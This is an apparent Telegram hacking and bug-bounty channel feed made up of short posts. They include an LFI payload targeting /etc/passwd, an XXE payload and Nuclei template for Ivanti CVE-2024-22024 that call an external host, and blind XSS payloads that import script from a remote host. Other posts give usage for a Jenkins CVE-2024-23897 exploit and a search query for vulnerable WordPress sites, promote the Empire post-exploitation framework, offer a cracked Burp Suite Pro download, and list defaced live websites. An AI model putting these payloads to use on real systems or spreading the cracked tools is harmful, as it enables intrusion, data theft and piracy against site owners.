BugCod3
7.26K subscribers
334 photos
6 videos
7 files
444 links
[ BugCod3 ] β€” From Shadows To Shells ⚑️

πŸ•Ά Hacking | 🐞 Bug Bounty | πŸ” Security Tools
βš”οΈ Learn β€’ Hunt β€’ Dominate

πŸ‘₯ Group: T.me/BugCod3GP
πŸ“‚ Topic: T.me/BugCod3Topic

🌐 Web: BugCod3.com
πŸ€– Contact: T.me/BugCod3BOT
πŸ“§ Email: BugCod3@protonmail.com
Download Telegram
πŸ‘‹ LFI Payload πŸ‘‹

Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#bugbountytips #bugbounty #CyberSecurity
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀3πŸ”₯2❀‍πŸ”₯1⚑1
CVE-2024-22024

XXE on Ivanti Connect Secure

☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#bugbountytips #cve #Ivanti
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑2❀2πŸ”₯1
JSON Smuggling: A far-fetched intrusion detection evasion technique

πŸ”— Medium

#infosec #cybersecurity #blueteam
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑2❀1πŸ”₯1
Nuclei PoC for Ivanti XXE (CVE-2024-22024)

id: CVE-2024-22024

info:
name: Ivanti Connect Secure - XXE
author: watchTowr
severity: high
description: |
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
remediation: |
Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
reference:
- https://labs.watchtowr.com/are-we-now-part-of-ivanti/
- https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
metadata:
max-request: 1
vendor: ivanti
product: "connect_secure"
shodan-query: "html:\"welcome.cgi?p=logo\""
tags: cve,cve2024,kev,xxe,ivanti

variables:
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
"http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'

http:
- raw:
- |
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

SAMLRequest={{base64(payload)}}

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"

- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950


#Nuclei #Templates #PoC #XXE
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑2πŸ€”2❀1❀‍πŸ”₯1πŸ‘1
πŸ₯© PDF

#Wordlist #PDF
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀2⚑2πŸ”₯1
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑2❀1πŸ”₯1
πŸ‘‘ Empire πŸ‘‘

πŸ’¬
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.

πŸ“Š Features:
βšͺ️ Server/Client Architecture for Multiplayer Support
βšͺ️ Supports GUI & CLI Clients
βšͺ️ Fully encrypted communications
βšͺ️ HTTP/S, Malleable HTTP, OneDrive, Dropbox, and PHP Listeners
βšͺ️ Massive library (400+) of supported tools in PowerShell, C#, & Python
βšͺ️ Donut Integration for shellcode generation
βšͺ️ Modular plugin interface for custom server features
βšͺ️ Flexible module interface for adding new tools
βšͺ️ Integrated obfuscation using ConfuserEx 2 & Invoke-Obfuscation
βšͺ️ In-memory .NET assembly execution
βšͺ️ Customizable Bypasses
βšͺ️ JA3/S and JARM Evasion
βšͺ️ MITRE ATT&CK Integration
βšͺ️ Integrated Roslyn compiler (Thanks to Covenant)
βšͺ️ Docker, Kali, ParrotOS, Ubuntu 20.04/22.04, and Debian 10/11/12 Install Support

πŸ”Ό Install:
cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh


😸 Github

#Hacktoberfest #C2 #Redteam #Infrastructure
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑2❀1πŸ‘1πŸ”₯1
Adding 2 new blind XSS payloads to the XSS scanner payload vault 😎

'"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)>

AND

'"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)>

#XSS #Bugbounty #Tip
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑5❀2πŸ”₯1
Bbal - Eye to Eye
Johar Records
⚑2πŸ”₯2πŸ‘€1
Linux for Hackers: LINUX commands you need to know

⬇️ Download

#linux #hacker #video
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑2❀1πŸ”₯1
πŸ‘ Burpsuite Pro πŸ‘

πŸ”₯ v2024.1.1.1

πŸ”” BurpBountyPro_v2.8.0 βž•

πŸ“‚ README (en+ru) included, plz read it before run BS.

πŸ”Ό Run with Java 18 (JDK for Win included)

⬇️ Download
πŸ”’ 311138

#Burpsuite #Pro #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑4πŸ”₯2❀1πŸ‘1🀣1
πŸ•Έ Site:
https://tysonmcguffin.com/index.html
https://bilberrybears.com/
https://flighttouch.com/
https://www.cameratouch.flighttouch.com/
https://mail.flighttouch.com/

πŸ‘β€πŸ—¨ Mirror-h

Country: πŸ‡ΊπŸ‡ΈπŸ‡ͺπŸ‡Έ

#Deface
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❀3⚑3πŸ”₯1
βœ… H1 asset fetcher βœ…

πŸ’¬
This h1finder.sh is script which collect all program names and then collect all assets and save it into wild and non-wild domains

You can get your API key from πŸ‘‰HackerOneπŸ‘ˆ

πŸ”Ό Installation:
cd h1-asset-fetcher
chmod +x h1finder
mv h1finder /usr/bin/


πŸ’» Usage:
h1finder -t <token> -u <username> -b <true/false>


βšͺ️ -t = H1 token
βšͺ️ -u = h1 username
βšͺ️ -b = true or false, if you want bounty only target set it to true if you want vdp only set it to false

😸 Github

⬇️ Download
πŸ”’ BugCod3

#BugBounty #Tips #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑3❀1πŸ‘1πŸ”₯1
‼️ PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks <= 1.9.6 CVSS 9.8 ‼️

Query Fofa: body="/wp-content/themes/bricks/"

πŸ“ž PoC
🌐 Nuclei Template

#BugBounty #Tips #Nuclei #Template
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑3❀2πŸ‘1πŸ”₯1
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ‘Ί Free query shodan 1000 result IP "Tips bug bounty" πŸ‘Ί

Example query:
https://shodan.io/search/facet?query=hostname%3A*.apnic.net&facet=ip

Download source page

Regex:
grep '<strong>' shodan.html | cut -d '>' -f 4 | cut -d '<' -f 1

#BugBounty #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑3❀1πŸ”₯1
πŸ‘» All-In-One Regex πŸ‘»

πŸ’¬
for searching leaked keys and secrets is a must-have. Here is how I was able to find a P1 recently using BurpSuite, The leaked secrets allowed me to see some employee related juicy info.

⬇️ Download
πŸ”’ BugCod3

#BugBounty #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑4❀2πŸ”₯2
πŸ¦‡ CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner πŸ¦‡

πŸ’¬ Description:
Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.

πŸ’» Usage:
Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.
python CVE-2024-23897.py -t <target> -p <port> -f <file>

or
python CVE-2024-23897.py -i <input_file> -f <file>


πŸ“Š Parameters:
βšͺ️ -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.

βšͺ️ -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line).

βšͺ️ -o or --output-file: Export results to file (optional).

βšͺ️ -p or --port: Specify the port number. Default is 8080 (optional).

βšͺ️ -f or --file: Specify the file to read on the target system.

😸 Github

⬇️ Download
πŸ”’ BugCod3

#CVE #PoC #Scanner
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑4❀3πŸ”₯1
10000 h1 disclosed reports

πŸ’¬
On 31st Dec 2023, I made it my goal to read 10,000 H1 Reports in 2024 Q1 (i.e. first 3 months) to really understand deep down what kind of bugs are being reported, accepted, or rejected and how exactly I should approach my journey in #bugbounty. Also, I thought, there was no better resource than actual disclosed bug reports. Later I decided to cap my goal at *5000* because I think I nailed the common pattern and already accomplished what I wanted to get out of it.

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #H1 #Report
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑3❀2πŸ”₯1πŸ’―1
Google Bug Bounty Dorks Generator

🌎 Site

#BugBounty #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑2❀1πŸ‘1πŸ”₯1πŸ’―1
πŸ•Έ DigitalOcean OpenVPN/SOCKS for Burp Suite

πŸ’¬
This Burp extension allows you to spin up a DigitalOcean droplet based on an OpenVPN configuration file. The droplet also functions as a SOCKS5 proxy to allow routing all Burp traffic through the VPN tunnel. The Burp proxy settings are automatically configured to route traffic through the SOCKS5 and OpenVPN droplet.

πŸ‘β€πŸ—¨ How to use:
πŸ”€ Download the JAR from build/libs/digitalocean-droplet-openvpn-all.jar or build from source yourself;
πŸ”€ Load the extension in Burp via the Extensions tab;
πŸ”€ Create a DigitalOcean API token and enter your token on the extension tab "OpenVPN/SOCKS";
πŸ”€ Select an OpenVPN configurataion file (.ovpn)
πŸ”€ Click "Deploy" to start deploying the SOCKS and OpenVPN containers on a fresh droplet, and the extension will take care of the rest;
πŸ”€ Allow up to a few minutes for the Docker image to complete installation before the proxy starts responding

πŸ“Š Features:
βšͺ️ Remember your DigitalOcean API token;
βšͺ️ Remember your OpenVPN configuration file and credentials (optional) per project file;
βšͺ️ Automatically shut down the droplet when Burp closes or the extension is unloaded;
βšͺ️ A context menu so you can right-click > enable or disable tunnelling through the VPN
βšͺ️ Opens a Repeater tab to ifconfig.co to easily verify if the VPN is working correctly

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Burp #Extension #bugbounty
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀3⚑1πŸ‘1πŸ”₯1πŸ’―1